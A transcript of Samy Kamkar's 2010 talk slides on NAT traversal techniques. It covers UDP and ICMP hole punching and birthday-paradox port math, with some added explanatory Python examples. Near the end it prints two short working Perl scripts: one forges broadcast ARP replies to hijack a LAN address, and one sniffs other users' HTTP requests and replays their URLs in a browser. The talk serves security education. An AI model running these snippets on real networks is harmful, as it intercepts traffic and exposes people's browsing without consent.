NETWORK CONQUERING: Advanced LAN Manipulation

Date post: 02-Feb-2016
Transcript
Page 1: NETWORK CONQUERING:   Advanced LAN Manipulation

NETWORK CONQUERING: Advanced LAN Manipulation

Samy Kamkar

July 10, 2010


LILAX

Page 2

Who is Samy?

• Co-Founder of Fonality, IP PBX Company

• Passionate Developer

• MySpace XSS Worm author

• “Narcissistic Vulnerability Pimp”

(aka Security Researcher for fun)

• Lady Gaga aficionado


Page 3

Why am I talking?

• Bore you with NATs and how they work

• Entertain you with pictures

• Teach unknown “features” of NATs

• Learn interesting paradoxes of NATs

• Check out tools to evade NATs

• I like turtles


Page 4

This is your network.


Page 5

This is your network on drugs.


Page 6

A NAT


Page 7

Things that went out of style by early 2000


IPs

Page 8

Onto the anatomy…

• Goal: penetrating a NAT from another NAT

• Typical NAT: when a packet is received, it’s normally only sent off to a client if it’s a packet from a pre-existing connection

• Thus, there should be no way to create a connection from one NAT to another if the destination NAT doesn’t allow unknown incoming packets


Page 9

Our path for a typical packet.


Page 10

Roadblock: the NAT? Nah…

• Educate: what is a NAT? How does it work?
  – …


Page 11

Roadblock: the NAT? Nah…

• Educate: what is a NAT? How does it work?
  – NAT RFCs 1631, 2663
  – linux-source/net/ipv4/netfilter/nf_nat_*.c

• …


Page 12

Roadblock: the NAT? Nah…

• Educate: what is a NAT? How does it work?
  – NAT RFCs 1631, 2663
  – linux-source/net/ipv4/netfilter/nf_nat_*.c

• Educate: what packets are normally allowed through? Part of what protocols?
  – …


Page 13

Roadblock: the NAT? Nah…

• Educate: what is a NAT? How does it work?
  – NAT RFCs 1631, 2663
  – linux-source/net/ipv4/netfilter/nf_nat_*.c

• Educate: what packets are normally allowed through? Part of what protocols?
  – TCP, RFC 793
    • RFC 5382 (NAT for TCP)
  – UDP, RFC 768
    • RFC 4787 (NAT for UDP)
  – ICMP, RFC 792
    • RFC 5508 (NAT for ICMP)

Page 14

Educate: the protocols

• We don’t know how to exploit the NAT.

• Can we exploit the protocol?

• TCP: only allows packets in from existing connections
  – So what is an “existing connection”?
  – A packet that matches source/dest IP, source/dest port, and seq/ack number (some of which are rewritten by the NAT)


Page 15

Educate: the protocols

• We don’t know how to exploit the NAT.

• Can we exploit the protocol?

• UDP: only allows packets in from existing “connections” (despite being connection-less)
  – So what is an “existing connection”?
  – A packet that matches source/dest IP, source/dest port
  – Wait a second… we know the source/dest IP, and we can control the source/dest ports…

(Figure: UDP header)


Page 16

Our path for a typical packet.


Page 17


Page 18

But my NAT munges ports!

• Well, damn.

• Some NATs randomize source port

• 16 bits = 65536 possible ports

• I can send ~550 packets in 1 second

• So 65536 packets in 120 seconds

Page 19

Birthday Paradox: to be 16 again

• Birthdays happen more often than you think.

  n = round( sqrt(-2 * ln(1 - probability_of_match)) * sqrt(total_items) )


Page 20

Birthday Paradox: continued

• If each side sends 545 random source packets regardless of whether NAT munges ports, there’s a 99% chance of collision!

• 23 people in a room = 50% chance

• 57 people = 99% chance

• 366 people = 100% chance

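The arithmetic behind these two slides, worked through as an added example (not code from the talk or from pwnat). It implements the slide's approximation for a single set of draws, the exact birthday probability behind the 23/57/366 figures, and the two-party model that applies when the two NATs pick their ports independently; PORT_SPACE, DAYS and the function names are mine.

```python
"""Birthday-paradox arithmetic behind the port-collision slides (added example)."""
import math

PORT_SPACE = 65536  # 16-bit source ports, as on the slide
DAYS = 365


def items_for_match(probability: float, total_items: int) -> int:
    """The slide's formula: draws from total_items so that some pair
    collides with the given probability. Single-set approximation, so it
    slightly undershoots (gives 22 for 50% of 365; the exact answer is 23)."""
    return round(math.sqrt(-2.0 * math.log(1.0 - probability)) * math.sqrt(total_items))


def single_set_collision(n: int, total_items: int) -> float:
    """Exact probability that n uniform draws are not all distinct:
    1 - prod_{i<n} (N - i)/N. This is the people-in-a-room case."""
    p_distinct = 1.0
    for i in range(n):
        p_distinct *= (total_items - i) / total_items
    return 1.0 - p_distinct


def two_party_collision(m: int, total_items: int) -> float:
    """Probability that two independent sets of m random values share one.
    This is the NAT case: one side's m guessed destination ports must hit
    one of the m randomized source ports the other NAT picked. Standard
    approximation 1 - (1 - m/N)^m ~= 1 - exp(-m^2/N)."""
    return 1.0 - math.exp(-(m * m) / total_items)


def packets_per_side(probability: float, total_items: int) -> int:
    """Invert two_party_collision: m = sqrt(-N ln(1 - p)) packets per side."""
    return round(math.sqrt(-total_items * math.log(1.0 - probability)))


if __name__ == "__main__":
    print("single set, 99% over 65536 ports:", items_for_match(0.99, PORT_SPACE))
    print("per side, 99% two-party:", packets_per_side(0.99, PORT_SPACE))
    print("545 per side:", round(two_party_collision(545, PORT_SPACE), 4))
    print("23 people:", round(single_set_collision(23, DAYS), 4))
```

The single-set formula needs about 777 ports for 99% over 65536, while the two-party model reaches 99% at roughly 549 packets per side, which is where the slide's 545 comes from.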

Page 21


Page 22

True client-server model

• How do we penetrate the NAT like a true client?

• Can we exploit the protocol?

• TCP: only allows packets in from existing connections
  – So what is an “existing connection”?
  – A packet that matches source/dest IP, source/dest port, and seq/ack number (some of which are rewritten by the NAT)

• UDP: only allows packets in from existing “connections” (despite being connection-less)
  – So what is an “existing connection”?
  – A packet that matches source/dest IP, source/dest port
  – But we don’t know the source IP…


Page 23

True client-server model cont.

• ICMP: Echo request
  – Requests never penetrate NATs, will never hit a client

• …


Page 24

True client-server model cont.

• ICMP: Echo request
  – Requests never penetrate NATs, will never hit a client

• ICMP: Echo reply
  – Replies only go through in response to a request
  – We know we can’t send a request; it never penetrates a NAT

• …


Page 25

True client-server model cont.

• ICMP: Echo request
  – Requests never penetrate NATs, will never hit a client

• ICMP: Echo reply
  – Replies only go through in response to a request
  – We know we can’t send a request; it never penetrates a NAT

• ICMP: Time exceeded (traceroute)
  – Only goes through in response to an IP packet
  – Well, all computers can send IP packets
  – How does a time exceeded packet work?
  – Content of packet must contain the packet originally sent out
  – We don’t know what the server sends out unless we arbitrarily send out fixed packets that we later “respond to”

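What a connection-tracking NAT checks before letting a Time Exceeded message in, as an added example (not pwnat or the talk's code): the ICMP payload quotes the original IP header plus the first 8 bytes of its payload, and only a quote that matches a flow the NAT itself sent out is forwarded, which is why the slide needs the "fixed packets" trick. The Flow type, the addresses and the ports are constructed, and the ICMP checksum is not verified.

```python
"""How a stateful NAT matches an ICMP Time Exceeded to an existing flow (added example)."""
import ipaddress
import struct
from typing import NamedTuple, Optional, Set

ICMP_TIME_EXCEEDED = 11


class Flow(NamedTuple):
    src: str    # post-NAT (public) source address of the outbound packet
    dst: str
    proto: int  # 6 = TCP, 17 = UDP
    sport: int
    dport: int


def parse_time_exceeded(icmp: bytes) -> Optional[Flow]:
    """Recover the flow quoted inside a Time Exceeded. RFC 792 requires the original
    IP header plus at least 8 bytes of payload, enough to read the ports. No checksum check."""
    if len(icmp) < 8 or icmp[0] != ICMP_TIME_EXCEEDED:
        return None
    inner = icmp[8:]                            # quoted original datagram
    if len(inner) < 20 or inner[0] >> 4 != 4:   # need a full IPv4 header
        return None
    ihl = (inner[0] & 0x0F) * 4
    if ihl < 20 or len(inner) < ihl + 8:        # need the 8 bytes after any options
        return None
    src = str(ipaddress.IPv4Address(inner[12:16]))
    dst = str(ipaddress.IPv4Address(inner[16:20]))
    sport, dport = struct.unpack("!HH", inner[ihl:ihl + 4])
    return Flow(src, dst, inner[9], sport, dport)


def nat_accepts(icmp: bytes, tracked: Set[Flow]) -> bool:
    """The NAT forwards the error inward only if the quoted flow is one it sent out."""
    flow = parse_time_exceeded(icmp)
    return flow is not None and flow in tracked


def build_time_exceeded(flow: Flow) -> bytes:
    """Constructed sample: a Time Exceeded quoting a minimal datagram for `flow`."""
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 28, 0x1234, 0, 1, flow.proto, 0,
                         ipaddress.IPv4Address(flow.src).packed,
                         ipaddress.IPv4Address(flow.dst).packed)
    l4_head = struct.pack("!HHHH", flow.sport, flow.dport, 8, 0)  # UDP-shaped 8 bytes
    return struct.pack("!BBHI", ICMP_TIME_EXCEEDED, 0, 0, 0) + ip_hdr + l4_head


if __name__ == "__main__":
    # Constructed addresses (RFC 5737 documentation ranges) and ports.
    sent = Flow("203.0.113.5", "198.51.100.7", 17, 40000, 2222)
    pkt = build_time_exceeded(sent)
    print(nat_accepts(pkt, {sent}))                        # True: matches tracked state
    print(nat_accepts(pkt, {sent._replace(sport=40001)}))  # False: unsolicited, dropped
```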

Page 26

A Brief History of Crime


Page 27


Page 28


Page 29

ARP Spoofing


Page 30

ARP Spoofing – Simple!

use strict;
use warnings;
use Packet::Inject;
use Packet::Ethernet;
use Packet::ARP;

my $device = "en0"; # interface to inject on (assumed value; the slide leaves $device undefined)

my $raw = Packet::Inject->new(device => $device); # inject raw packets!
my $eth = Packet::Ethernet->new()->encode();      # eth pkt will broadcast
my $arp = Packet::ARP->new(
  sender_eth => "a:b:c:d:e:f",       # our MAC
  target_eth => "ff:ff:ff:ff:ff:ff", # broadcast
  sender_ip  => "10.0.0.1",          # ip we’re stealing
  target_ip  => "255.255.255.255",   # notifying broadcast
)->encode();                         # now we have a built packet $arp

$raw->open();                        # open our device for injection
$raw->write(packet => $eth . $arp);  # inject!!!
$raw->close();


Page 31

Epic Browser Sniffing FTW

use strict;
use warnings;
use Packet::Ethernet;
use Packet::IP;  # assumed: IP and TCP decoders from the same Packet library as Packet::Ethernet
use Packet::TCP;

# Decoder objects reused across callbacks (the slide uses them without declaring them)
my $eth = Packet::Ethernet->new();
my $ip  = Packet::IP->new();
my $tcp = Packet::TCP->new();

# Net::Pcap-style per-packet callback: ($user_data, $pcap_header, $raw_packet)
sub callback {
  my ($ud, $hdr, $pkt, $s) = @_;
  $eth->decode($pkt);                                  # decode ethernet packet
  if ($eth->type == 0x0800) {                          # 0x0800 == IP packet
    $ip->decode($eth->data);                           # decode IP packet
    if ($ip->proto == 6) {                             # TCP packet
      $tcp->decode($ip->data);                         # decode TCP packet
      if ($tcp->dest_port == 80) {                     # HTTP packet
        # read HTTP header
        if ($tcp->data =~ /GET (\S+) HTTP.*?Host: (\S+)/s) {
          my $url = "http://$2$1";
          # use applescript to open our browser!
          # list-form system(): the sniffed URL is never interpolated into a shell command line
          system('osascript', '-e', qq{tell application "Safari" to open location "$url"});
        }
      }
    }
  }
}

Page 32


Page 33

Q&A

A gentleman never asks.
A lady never tells.


Page 34

Fin

pwnat: samy.pl/pwnat
chownat: samy.pl/chownat
Packet: samy.pl/packet

Samy [email protected] twitter.com/SamyKamkar

